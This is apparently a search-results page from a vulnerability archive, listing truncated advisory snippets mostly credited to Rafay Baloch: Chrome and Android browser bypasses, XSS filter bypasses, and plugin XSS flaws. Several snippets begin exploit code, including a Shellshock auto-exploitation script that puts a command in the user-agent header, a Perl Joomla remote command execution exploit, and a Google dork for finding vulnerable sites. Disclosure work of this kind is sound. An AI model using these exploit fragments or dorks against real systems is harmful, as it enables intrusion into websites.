25 matches found
Google Chrome 109.0.5414.74 Unsafe Library Load Vulnerability
Google Chrome version 109.0.5414.74 on Ubuntu attempts to load libnssckbi.so from a user-writable location and if missing, a replacement piece of malware can be used by an attacker to achieve code execution. Although privilege escalation is not likely as an attacker would already need access to t...
Mobile Browser Bugs Open Safari, Opera Users to Malware
A set of address-bar spoofing vulnerabilities that affect a number of mobile browsers open the door for malware delivery, phishing and disinformation campaigns. The bugs, reported by Rapid7 and independent researcher Rafay Baloch, affect six browsers, ranging from the common Apple Safari, Opera...
Microsoft Internet Explorer 11 XSS Filter Bypass
Vulnerability: IE 11 XSS Filter Bypass Impact: Moderate Authors: Rafay Baloch Company: RHAInfoSec Website: http://rafayhackingarticles.net version: Latest Description Internet explorer 11 Suffers from a XSS Filter bypass using cp1025 charset. This is highly effective when the charset has not been...
Shell Shock Auto Exploitation Script
Title: Shell Shock Auto Exploitation Script Author: Rafay Baloch import requests,sys if lensys.argv 2: print "Usage: shocktest.py file.txt" exit0 def main: file = sys.argv1 with openfile as f: file = f.read.splitlines for url in file: cmd=" test;;/bin/nopatchobfu" headers = 'user-agent': cmd...
Android Browser Same Origin Policy Bypass Vulnerability
A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, this is very rarely found in modern browsers. However, they are found once in a while. Vulnerability: Android...
Google Chrome 31.0 XSS Auditor Bypass Vulnerability
Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an...
Google Chrome 36.0 XSS Auditor Bypass
Vulnerability: Google Chrome 36.0 XSS Auditor Bypass Impact: Moderate Authors: Rafay Baloch Company: RHAInfoSec Website: http://rhainfosec.com version: Latest Description Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the...
Lavarel-Security XSS Filter Bypass Vulnerability
Lavarel-Security cross site scripting filter suffers from a bypass vulnerability. Product: Lavarel-Security XSS Filter Bypass Vulnerability: Mutation Based XSS Bypass Impact: Medium/High Authors: Rafay Baloch Company: RHAinfoSEC Website: http://rhainfosec.com Status: Fixed ========= Description...
Joomla JMultimedia Command Execution
!/usr/bin/perl Exploit Title: comjmultimedia Remote Command Execution Author: Deepankar Arora and Rafay Baloch Vendor: http://joomlacode.org/gf/project/denvideo/ Enter the target in this form -- http://victim.com/ Change shell path to your own, if needed use LWP::UserAgent; use HTTP::Request;...
WordPress Pretty Photo Cross Site Scripting
Wp-Pretty Photo DOM Based XSS Vulnerability Details ======= Product: PrettyPhoto Plugin Security-Risk: Moderate Remote-Exploit: yes Company: RHAINFOSEC Website: http://services.rafayhackingarticles.net Vendor-URL: https://github.com/scaron/prettyphoto Vendor-Status: informed Advisory-Status:...
OWASP Java Encoder Filter Bypass
Product: OWASP Java Encoder Vulnerability: Mutation Based XSS Bypass Impact: Medium/Limited Authors: Rafay Baloch And Alex Infuhr Company: RHAinfoSEC Website: http://services.rafayhackingarticles.net Status: To be fixed in the next release ========= Description ========= Owasp encoder is an...
Modsecurity Cross Site Scripting Bypass Vulnerability
Modsecurity suffers from a cross site scripting bypass vulnerability. Product: Modsecurity Author: Rafay Baloch Company: RHAINFOSEC Website: http://services.rafayhackingarticles.net Reported: 8/8/2013 Fixed: 25/8/2013 Status: Fixed ============ Introduction ============ The ModSecurity firewall i...
Modsecurity Cross Site Scripting Bypass
Product: Modsecurity Author: Rafay Baloch Company: RHAINFOSEC Website: http://services.rafayhackingarticles.net Reported: 8/8/2013 Fixed: 25/8/2013 Status: Fixed ============ Introduction ============ The ModSecurity firewall is one of the most known WAF around, It has anonline smoke test where w...
Xorbin Analog Flash Clock 1.0 For WordPress XSS
==================================================================== Xorbin Analog Flash Clock 1.0 Plugin for Wordpress Flash-based XSS ==================================================================== Description: This plugin displays analog flash clock on your website. It's easy to use and...
Xorbin Digital Flash Clock 1.0 For WordPress XSS
==================================================================== Xorbin Digital Flash Clock 1.0 Plugin for Wordpress Flash-based XSS ==================================================================== Description: This plugin displays digital flash clock on your website. It's easy to use and...
Xorbin Analog Flash Clock 1.0 For Joomla XSS
==================================================================== Xorbin Analog Flash Clock 1.0 Extension for Joomla Flash-based XSS ==================================================================== Description: This plugin displays analog flash clock on your website. It's easy to use and...
CyberKendra Search Bar Cross Site Scripting
RHA InfoSec CyberKendra Search Bar Script DOM Based XSS Vulnerability Details ============= Risk: Moderated Vendor-URL: http://www.cyberkendra.com/ Credits ============= Discovered by: Rafay Baloch And Prakhar Prasad of RHA InfoSec Blog: http://rafayhackingarticles.net Description ============...
HtmlCommentBox Cross Site Scripting
Exploit Title: HtmlCommentBox Multiple Vulnerabilities Release Date: 01/06/2013 Author: Rafay Baloch And Deepankar Arora Website: www.rafayhackingarticles.net Contact: www.rafayhackingarticles.net Vendor: www.htmlcommentbox.com Versions Affected: All Google Dork: intext:"by HtmlCommentBox" 1...
Fork CMS Cross Site Scripting
=================================================================================== Fork-CMS Stored XSS: Stored XSS: Author: Rafay Baloch Introduction: Cross Site scritping XSS has been a problem for ages, XSS occurs when the input data is copied into application responses without being sanitized...
Your Own Classifieds Cross Site Scripting
Vendor: http://www.yourownclassifieds.com Description: Your own classified software is a script that helps you creates your own store. Discovered by: Rafay Baloch Vulnerability: Non persistent XSS The script fails to sanitize the input that is entered into the text box resulting into a XSS. POC:...